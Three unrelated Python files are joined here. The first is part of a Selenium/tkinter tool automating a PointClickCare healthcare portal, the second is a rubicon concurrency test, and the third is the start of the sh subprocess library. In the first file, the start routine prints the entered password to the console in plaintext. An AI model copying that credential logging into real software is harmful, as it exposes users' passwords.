current_users=driver.find_element(By.CLASS_NAME, 'pccTableShowDivider').find_elements(By.TAG_NAME, 'tr')
except Exception as e:
print(e)
# sendRequest(targent_name, "Error: Unable to find user", True)
pass
else:
print("NOT FOUND - " + target_user_id + "-" + target_user_a + "-" + targent_name)
res = write_file_data(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "," + str(target_user_id) + "," + str(target_user_a) + "," + targent_name + "\n")
if res:
sendRequest(targent_name, "Error: Unable to write not found error log", True)
driver.close()
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Could not switch to main window", True)
continue
#except:
except Exception as e:
print(e)
sendRequest(targent_name, "Error: Unable to select user", True)
pass
except Exception as e:
print(e)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "error.txt"), "a") as myfile:
myfile.write(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " - " + str(e) + "\n")
pass
print("PROCESS COMPLETED")
sendRequest("System", "Process Completed", False)
# Return the most recent (last) immunization record in the list
def get_covid_vaccine_by_name(imm_list):
return imm_list[-1]
def stop_automation_thread():
# Toggle the stop flag: pressing Stop halts a running automation, and
# pressing it again re-arms it
global thread_stopped
thread_stopped = not thread_stopped
def get_excel_file():
global patient_data_sheet
# Open file explorer and select only xlsx file types
filename = fd.askopenfilename(
title='Open a file',
initialdir='/',
filetypes=[("Excel file","*.xlsx")])
patient_data_sheet = filename
class NewprojectApp:
def __init__(self, master=None):
global selected_sheet
df = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.xlsx"), sheet_name=None)
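# sheet_name=None makes pandas return a dict of DataFrames keyed by sheet
# name, which is what populates the sheet dropdown built below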
def start_automation_thread():
# Set global variable to false
global thread_stopped, user_name, password, selected_sheet
thread_stopped = False
# user_name = self.e1a.get()
password = self.e2a.get()
print('###############')
# print(user_name)
print(password)
print('###############')
# Create new thread target automation
thread_x = Thread(target=main_loop, args=[])
# Start Tread Activity
thread_x.start()
# build ui
self.toplevel1 = tk.Tk() if master is None else tk.Toplevel(master)
# Title Label
self.label1 = ttk.Label(self.toplevel1)
self.label1.configure(background='#ff5454', font='{@Microsoft YaHei} 12 {}',
text='PCC')
self.label1.pack(pady='10', side='top')
self.frame2 = tk.Frame(self.toplevel1)
# self.e1 = tk.Label(self.frame2)
# self.e1.configure(background='#ffffff', text="User Name")
# self.e1.pack()
# self.e1a = tk.Entry(self.frame2)
# self.e1a.pack()
self.e2 = tk.Label(self.frame2)
self.e2.configure(background='#ffffff', text="Password")
self.e2.pack()
self.e2a = tk.Entry(self.frame2)
self.e2a.pack()
# Open Chrome Button
self.button5 = tk.Button(self.frame2)
self.button5.configure(text='Open Chrome', command=open_chrome)
self.button5.pack(ipadx='20', ipady='0', pady='5', side='top')
# Sheets
options = list(df.keys())
clicked = tk.StringVar()
clicked.set(options[0])
selected_sheet = options[0]
self.drop = tk.OptionMenu(self.frame2, clicked, *options, command=selectSheet)
self.drop.pack()
# Start Button
self.button6 = tk.Button(self.frame2)
self.button6.configure(text='Start', command=start_automation_thread)
self.button6.pack(ipadx='20', pady='5', side='top')
# Stop Button
self.button7 = tk.Button(self.frame2)
self.button7.configure(text='Stop', command=stop_automation_thread)
self.button7.pack(ipadx='20', pady='5', side='top')
# Version Footer
self.label2 = tk.Label(self.frame2)
self.label2.configure(background='#ffffff', text="Version 2.2")
self.label2.pack(side='top')
self.frame2.configure(background='#ffffff', height='200', width='200')
self.frame2.pack(side='top')
# Window title bar
self.toplevel1.configure(background='#ffffff', height='200', width='300')
self.toplevel1.minsize(300, 200)
self.toplevel1.overrideredirect(False)
self.toplevel1.resizable(False, False)
self.toplevel1.title('Pointclick Care Automator')
# Main widget
self.mainwindow = self.toplevel1
def run(self):
self.mainwindow.mainloop()
if __name__ == '__main__':
app = NewprojectApp()
app.run()
|
test_concurrency.py
|
import multiprocessing
import pandas as pd
from dask import dataframe as dd
from rubicon.domain.utils import uuid
def _log_all_to_experiment(experiment):
ddf = dd.from_pandas(pd.DataFrame([0, 1], columns=["a"]), npartitions=1)
for _ in range(0, 4):
experiment.log_metric(uuid.uuid4(), 0)
experiment.log_feature(uuid.uuid4())
experiment.log_parameter(uuid.uuid4(), 1)
experiment.log_artifact(data_bytes=b"artifact bytes", name=uuid.uuid4())
experiment.log_dataframe(ddf)
experiment.add_tags([uuid.uuid4()])
def _read_all_from_experiment(experiment):
for _ in range(0, 4):
experiment.metrics()
experiment.features()
experiment.parameters()
experiment.artifacts()
experiment.dataframes()
experiment.tags
def test_filesystem_concurrency(rubicon_local_filesystem_client):
rubicon = rubicon_local_filesystem_client
project = rubicon.create_project("Test Concurrency")
experiment = project.log_experiment()
processes = []
for _ in range(0, 4):
process = multiprocessing.Process(target=_read_all_from_experiment, args=[experiment])
process.start()
processes.append(process)
for _ in range(0, 4):
process = multiprocessing.Process(target=_log_all_to_experiment, args=[experiment])
process.start()
processes.append(process)
for process in processes:
process.join()
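# 4 writer processes x 4 iterations each = 16 entries of every entity type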
assert len(experiment.metrics()) == 16
assert len(experiment.features()) == 16
assert len(experiment.parameters()) == 16
assert len(experiment.artifacts()) == 16
assert len(experiment.dataframes()) == 16
assert len(experiment.tags) == 16
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
# ===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ===============================================================================
__version__ = "1.14.1"
__project_url__ = "https://github.com/amoffat/sh"
from collections import deque
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
from types import ModuleType, GeneratorType
import ast
import errno
import fcntl
import gc
import getpass
import glob as glob_module
import inspect
import logging
import os
import platform
import pty
import pwd
import re
import select
import signal
import stat
import struct
import sys
import termios
import threading
import time
import traceback
import tty
import warnings
import weakref
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & select.POLLOUT:
results.append((f, POLLER_EVENT_WRITE))
elif events & select.POLLHUP:
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
@staticmethod
def _register(f, events):
if f not in events:
events.append(f)
@staticmethod
def _unregister(f, events):
if f in events:
events.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
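# Illustrative sketch (added for exposition, not part of the original module):
# both Poller implementations above expose the same minimal interface, so
# calling code can stay poller-agnostic:
#
#     poller = Poller()
#     poller.register_read(proc_stdout)           # file object or raw fd
#     for f, event in poller.poll(timeout=1.0):   # timeout in seconds
#         if event == POLLER_EVENT_READ:
#             handle_read(f)  # hypothetical stand-in for the caller's read logic
#         elif event == POLLER_EVENT_ERROR:
#             poller.unregister(f)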
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except UnicodeEncodeError:
s = s.encode(fallback_encoding, "replace")
return s
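# illustrative note (added for exposition): on Python 3,
# encode_to_py3bytes_or_py2str("ls") == b"ls"; on Python 2 it returns a str
# encoded with the system's preferred encoding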
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __reduce__(self):
return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate)
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
self.truncate = truncate
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
if not IS_PY3:
# Exception messages should be treated as an API which takes native str type on both
# Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
# Python3)
msg = encode_to_py3bytes_or_py2str(msg)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode):
pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout or .wait(timeout)) was hit """
def __init__(self, exit_code, full_cmd):
self.exit_code = exit_code
self.full_cmd = full_cmd
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError):
pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)])
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc >= 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
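# illustrative examples (added for exposition): positive exit codes produce
# ErrorReturnCode subclasses and negative ones produce SignalException
# subclasses, e.g.
#
#     get_rc_exc(1).__name__    # "ErrorReturnCode_1"
#     get_rc_exc(-9).__name__   # "SignalException_SIGKILL"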
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
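# illustrative note (added for exposition): because an empty GlobResults
# still remembers its pattern, compile_args() below can substitute the
# literal pattern instead of silently dropping every argument:
#
#     matches = glob_module.glob("*.nomatch")  # GlobResults([], path="*.nomatch")
#     sh.ls(matches)                           # runs `ls *.nomatch`, not bare `ls`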
def canonicalize(path):
return os.path.abspath(os.path.expanduser(path))
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(file_path):
return (os.path.exists(file_path) and
os.access(file_path, os.X_OK) and
os.path.isfile(os.path.realpath(file_path)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = canonicalize(program)
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(canonicalize(path), program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
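# e.g. resolve_command_path("google_chrome") falls back to looking up
# "google-chrome" on PATH (illustrative, hypothetical binary name)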
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.context = self.sanitize_context(context)
def _format_msg(self, msg, *a):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % a
@staticmethod
def sanitize_context(context):
if context:
context = context.replace("%", "%%")
return context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
return Logger(new_name, new_context)
def info(self, msg, *a):
self.log.info(self._format_msg(msg, *a))
def debug(self, msg, *a):
self.log.debug(self._format_msg(msg, *a))
def error(self, msg, *a):
self.log.error(self._format_msg(msg, *a))
def exception(self, msg, *a):
self.log.exception(self._format_msg(msg, *a))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to pass through to OProc
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out of our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._waited_until_completion = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.debug("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.context = self.log.sanitize_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self, timeout=None):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait.
this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
launched, or because of a timeout passed into this method.
"""
if not self._waited_until_completion:
# if we've been given a timeout, we need to poll is_alive()
if timeout is not None:
waited_for = 0
sleep_amt = 0.1
alive = False
exit_code = None
if timeout < 0:
raise RuntimeError("timeout cannot be negative")
# while we still have time to wait, run this loop
# notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run,
# defining them, given the constraints that timeout is non-negative
while waited_for <= timeout:
alive, exit_code = self.process.is_alive()
# if we're alive, we need to wait some more, but let's sleep before we poll again
if alive:
time.sleep(sleep_amt)
waited_for += sleep_amt
# but if we're not alive, we're done waiting
else:
break
# if we've made it this far, and we're still alive, then it means we timed out waiting
if alive:
raise TimeoutException(None, self.ran)
# if we didn't time out, we fall through and let the rest of the code handle exit_code.
# notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
# re-wait again on timeout, if we catch the TimeoutException in the parent frame
self._waited_until_completion = True
else:
exit_code = self.process.wait()
self._waited_until_completion = True
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code, self.ran)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.debug("process completed")
return self
def is_alive(self):
""" returns whether or not we're still alive. this call has side-effects on OProc """
return self.process.is_alive()[0]
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the command be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, exc_type, exc_val, exc_tb):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
s1 = set(passed_kwargs.keys())
invalid_args = []
for elem in invalid_list:
if callable(elem):
fn = elem
ret = fn(passed_kwargs, merged_kwargs)
invalid_args.extend(ret)
else:
elem, error_msg = elem
if s1.issuperset(elem):
invalid_args.append((elem, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return a method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
